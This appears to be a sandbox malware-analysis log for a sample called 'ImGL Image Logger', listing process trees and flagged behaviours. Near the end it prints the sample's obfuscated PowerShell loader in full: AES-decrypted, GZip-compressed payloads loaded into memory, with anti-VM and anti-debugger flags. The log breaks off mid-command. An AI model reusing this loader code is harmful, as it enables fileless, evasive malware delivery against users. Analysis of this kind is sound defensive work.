PID 4244 wrote to memory of 3832	4244	msedge.exe	msedge.exe
PID 4244 wrote to memory of 3832	4244	msedge.exe	msedge.exe
PID 4244 wrote to memory of 3832	4244	msedge.exe	msedge.exe
PID 4244 wrote to memory of 3832	4244	msedge.exe	msedge.exe
PID 4244 wrote to memory of 3832	4244	msedge.exe	msedge.exe
PID 4244 wrote to memory of 3832	4244	msedge.exe	msedge.exe
PID 4244 wrote to memory of 3832	4244	msedge.exe	msedge.exe
PID 4244 wrote to memory of 3832	4244	msedge.exe	msedge.exe
PID 4244 wrote to memory of 3832	4244	msedge.exe	msedge.exe
PID 4244 wrote to memory of 3832	4244	msedge.exe	msedge.exe
PID 4244 wrote to memory of 3832	4244	msedge.exe	msedge.exe
PID 4244 wrote to memory of 3832	4244	msedge.exe	msedge.exe
PID 4244 wrote to memory of 3832	4244	msedge.exe	msedge.exe
PID 4244 wrote to memory of 3832	4244	msedge.exe	msedge.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:612

C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{daf4bfc8-1a7d-4a2b-a123-f0e846233a2c}
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:776

C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{2a29cb3e-82aa-459f-8c11-fb6225180531}
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5028

C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{f2efb037-ec95-4f25-b6f4-5939b3062cd4}
2⤵
PID:3356

C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{70416bd5-9137-4453-8c2d-710f73a23508}
2⤵
PID:7120

C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{9a5d2eb4-8e21-4da0-b861-896a54e3cea8}
2⤵
PID:5284

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell start shell:Appsfolder\Microsoft.MicrosoftEdge_8wekyb3d8bbwe!MicrosoftEdge https://store2.gofile.io/download/96bc7856-5bef-437c-9a3d-9fb2b7ed3ea8/ImGL%20Image%20Logger.zip
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4316

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --edge-redirect=Windows.Launch https://store2.gofile.io/download/96bc7856-5bef-437c-9a3d-9fb2b7ed3ea8/ImGL%20Image%20Logger.zip
1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:4244

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffda07146f8,0x7ffda0714708,0x7ffda0714718
2⤵
PID:116

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2144,15107277730508090351,14894108069487568308,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2196 /prefetch:2
2⤵
PID:1772

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2144,15107277730508090351,14894108069487568308,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2376 /prefetch:3
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:4224

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2144,15107277730508090351,14894108069487568308,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3008 /prefetch:8
2⤵
PID:3832

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,15107277730508090351,14894108069487568308,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3664 /prefetch:1
2⤵
PID:3964

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,15107277730508090351,14894108069487568308,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3688 /prefetch:1
2⤵
PID:452

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,15107277730508090351,14894108069487568308,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5172 /prefetch:1
2⤵
PID:4128

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,15107277730508090351,14894108069487568308,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4944 /prefetch:1
2⤵
PID:4112

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,15107277730508090351,14894108069487568308,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5660 /prefetch:1
2⤵
PID:4700

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,15107277730508090351,14894108069487568308,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5176 /prefetch:1
2⤵
PID:2800

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,15107277730508090351,14894108069487568308,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5336 /prefetch:1
2⤵
PID:1140

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,15107277730508090351,14894108069487568308,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6212 /prefetch:1
2⤵
PID:4584

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,15107277730508090351,14894108069487568308,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6424 /prefetch:1
2⤵
PID:752

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,15107277730508090351,14894108069487568308,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6360 /prefetch:1
2⤵
PID:1900

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,15107277730508090351,14894108069487568308,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6152 /prefetch:1
2⤵
PID:1656

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,15107277730508090351,14894108069487568308,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7312 /prefetch:1
2⤵
PID:2856

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,15107277730508090351,14894108069487568308,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7316 /prefetch:1
2⤵
PID:3888

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,15107277730508090351,14894108069487568308,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5336 /prefetch:1
2⤵
PID:3708

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,15107277730508090351,14894108069487568308,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6164 /prefetch:1
2⤵
PID:4792

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,15107277730508090351,14894108069487568308,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6592 /prefetch:1
2⤵
PID:5216

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,15107277730508090351,14894108069487568308,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8156 /prefetch:1
2⤵
PID:5264

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,15107277730508090351,14894108069487568308,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7584 /prefetch:1
2⤵
PID:5672

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2144,15107277730508090351,14894108069487568308,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=8040 /prefetch:8
2⤵
PID:5664

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2144,15107277730508090351,14894108069487568308,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=8856 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:5688

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,15107277730508090351,14894108069487568308,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8916 /prefetch:1
2⤵
PID:5828

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,15107277730508090351,14894108069487568308,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8904 /prefetch:1
2⤵
PID:5820

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2144,15107277730508090351,14894108069487568308,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6532 /prefetch:8
2⤵
PID:5204

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings
2⤵
- Drops file in Program Files directory
PID:5252

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x220,0x224,0x228,0x1fc,0x22c,0x7ff703315460,0x7ff703315470,0x7ff703315480
3⤵
PID:5488

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2144,15107277730508090351,14894108069487568308,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6532 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:5800

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,15107277730508090351,14894108069487568308,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7492 /prefetch:1
2⤵
PID:5964

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,15107277730508090351,14894108069487568308,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5448 /prefetch:1
2⤵
PID:5300

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1064

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
1⤵
PID:1140

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:6252

C:\Users\Admin\Downloads\ImGL Image Logger\ImGL Image Logger\ImGL.exe
"C:\Users\Admin\Downloads\ImGL Image Logger\ImGL Image Logger\ImGL.exe"
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:5012

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C cd /d %systemdrive% & C:\Users\Admin\AppData\Local\Temp\b3a0b3fc-606d-4f23-969e-c5623422c614.bat & exit
2⤵
PID:5784

C:\Users\Admin\AppData\Local\Temp\b3a0b3fc-606d-4f23-969e-c5623422c614.bat.exe
"b3a0b3fc-606d-4f23-969e-c5623422c614.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function MwFMr($vXaCN){ $VwbLM=[System.Security.Cryptography.Aes]::Create(); $VwbLM.Mode=[System.Security.Cryptography.CipherMode]::CBC; $VwbLM.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $VwbLM.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('NPRiiZwfydr2EPDpG1kujtbpLiUA2dIDHHcnlbJhYL4='); $VwbLM.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JVHTpkJ+Ogq5s7sEEUURbg=='); $UfWJi=$VwbLM.CreateDecryptor(); $return_var=$UfWJi.TransformFinalBlock($vXaCN, 0, $vXaCN.Length); $UfWJi.Dispose(); $VwbLM.Dispose(); $return_var;}function QKtYD($vXaCN){ $ZPGyH=New-Object System.IO.MemoryStream(,$vXaCN); $FtFLD=New-Object System.IO.MemoryStream; $zfLIM=New-Object System.IO.Compression.GZipStream($ZPGyH, [IO.Compression.CompressionMode]::Decompress); $zfLIM.CopyTo($FtFLD); $zfLIM.Dispose(); $ZPGyH.Dispose(); $FtFLD.Dispose(); $FtFLD.ToArray();}function wazmV($vXaCN,$EwdaX){ $jxfxx=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$vXaCN); $nKlfp=$jxfxx.EntryPoint; $nKlfp.Invoke($null, $EwdaX);}$RZLpH=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\b3a0b3fc-606d-4f23-969e-c5623422c614.bat').Split([Environment]::NewLine);foreach ($FvXIR in $RZLpH) { if ($FvXIR.StartsWith(':: ')) { $KtNjW=$FvXIR.Substring(3); break; }}$oDBjl=[string[]]$KtNjW.Split('\');$HscYZ=QKtYD (MwFMr ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($oDBjl[0])));$dbKLW=QKtYD (MwFMr ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($oDBjl[1])));wazmV $dbKLW (,[string[]] (''));wazmV $HscYZ (,[string[]] (''));
3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2916

C:\Windows\$sxr-powershell.exe
"C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command function QPIus($PJoKM){ $zAHbk=[System.Security.Cryptography.Aes]::Create(); $zAHbk.Mode=[System.Security.Cryptography.CipherMode]::CBC; $zAHbk.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $zAHbk.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('w6PbCSjOWBULeJA+WxjUusyz8BOgvMC8wi3jYye4mi8='); $zAHbk.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('01Zkym2rf0478fR2cIhJtQ=='); $bZtha=$zAHbk.('rotpyrceDetaerC'[-1..-15] -join '')(); $rEqrJ=$bZtha.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($PJoKM, 0, $PJoKM.Length); $bZtha.Dispose(); $zAHbk.Dispose(); $rEqrJ;}function bvLKH($PJoKM){ $qbDkP=New-Object System.IO.MemoryStream(,$PJoKM); $xZBvX=New-Object System.IO.MemoryStream; $OugwY=New-Object System.IO.Compression.GZipStream($qbDkP, [IO.Compression.CompressionMode]::Decompress); $OugwY.CopyTo($xZBvX); $OugwY.Dispose(); $qbDkP.Dispose(); $xZBvX.Dispose(); $xZBvX.ToArray();}function yOuXN($PJoKM,$TPKFP){ $HzAuX=[System.Reflection.Assembly]::Load([byte[]]$PJoKM); $njNEM=$HzAuX.EntryPoint; $njNEM.Invoke($null, $TPKFP);}$zAHbk1 = New-Object System.Security.Cryptography.AesManaged;$zAHbk1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$zAHbk1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$zAHbk1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('w6PbCSjOWBULeJA+WxjUusyz8BOgvMC8wi3jYye4mi8=');$zAHbk1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('01Zkym2rf0478fR2cIhJtQ==');$XATWs = $zAHbk1.('rotpyrceDetaerC'[-1..-15] -join '')();$InvRe = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('K1CkLsbgHsaqjP07dOw2WA==');$InvRe = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($InvRe, 0, $InvRe.Length);$InvRe = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($InvRe);$lHCNf = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mgaXTEcchBwKiFfurNf/ZvU7pDIOIRUS5fl2vv2xXeE=');$lHCNf = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($lHCNf, 0, $lHCNf.Length);$lHCNf = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($lHCNf);$mvSac = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('SMFDBATqcCLCffiPgcVkeA==');$mvSac = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mvSac, 0, $mvSac.Length);$mvSac = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mvSac);$fYhvB = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('m0/I7rIGbiBVxCE4WTkxKXrIhId+xRJu1rELFg0sRatzAZFJErBaN0cXbJ97o8zEIQUuHdn0E9FLwW/h/U1hc6jwkcijx4lE6VkAH1OJkts5kyb2YIRluw8m1KC/amNr0TCUnPudPp3KBcVKGDC8TzQuwcLP3xvVlp9FkaoWtmG/i2TedFhwHEgMOB09p7WNJA0Q1cbZD90fmmUxB03UL7S26YlUwLgKbUG2E+hkLUo2XBW1SjqK7s+7KIv+FxsKe1Q6epFglHVxCjSwGwIQAUvg2C1GxLbKYm14kxWUxy85/0FO+48f/xHK6Ka1ZeQ20mgOghTmQ9IpFjCI/zOREYShr3iKDdcQdquznhnOBRIW9QNSuxuM+GBRAkeVB3KmWlyH/45GbF7FqE/6zVPhshlGma0EpQE1qJQpZ79Dnyw=');$fYhvB = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($fYhvB, 0, $fYhvB.Length);$fYhvB = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($fYhvB);$hBYHy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('C9m3OdpGwFdHwPwMI02P1Q==');$hBYHy = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hBYHy, 0, $hBYHy.Length);$hBYHy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($hBYHy);$mLgUM = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('QnlbpdXHpcZ8OIW6I8JHEw==');$mLgUM = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mLgUM, 0, $mLgUM.Length);$mLgUM = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mLgUM);$UJkfe = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRq92anf130ThOkt+/oHfQ==');$UJkfe = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UJkfe, 0, $UJkfe.Length);$UJkfe = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UJkfe);$diyny = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('nOan84KwuQvybSDbMNzbwg==');$diyny = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($diyny, 0, $diyny.Length);$diyny = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($diyny);$igBFA = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('9I86vNBFZFkDSOaT6Axf1g==');$igBFA = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($igBFA, 0, $igBFA.Length);$igBFA = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($igBFA);$InvRe0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('YYa8OopsH+ndA18TV9aICA==');$InvRe0 = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($InvRe0, 0, $InvRe0.Length);$InvRe0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($InvRe0);$InvRe1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2FAiKLQ+H7mhnGGHhuoROg==');$InvRe1 = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($InvRe1, 0, $InvRe1.Length);$InvRe1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($InvRe1);$InvRe2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('K4DD6mV1zT0l1FL5isTMSg==');$InvRe2 = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($InvRe2, 0, $InvRe2.Length);$InvRe2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($InvRe2);$InvRe3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('tNPPHPCKJCXJeBbFBVQkNg==');$InvRe3 = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($InvRe3, 0, $InvRe3.Length);$InvRe3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($InvRe3);$XATWs.Dispose();$zAHbk1.Dispose();$HsmvD = 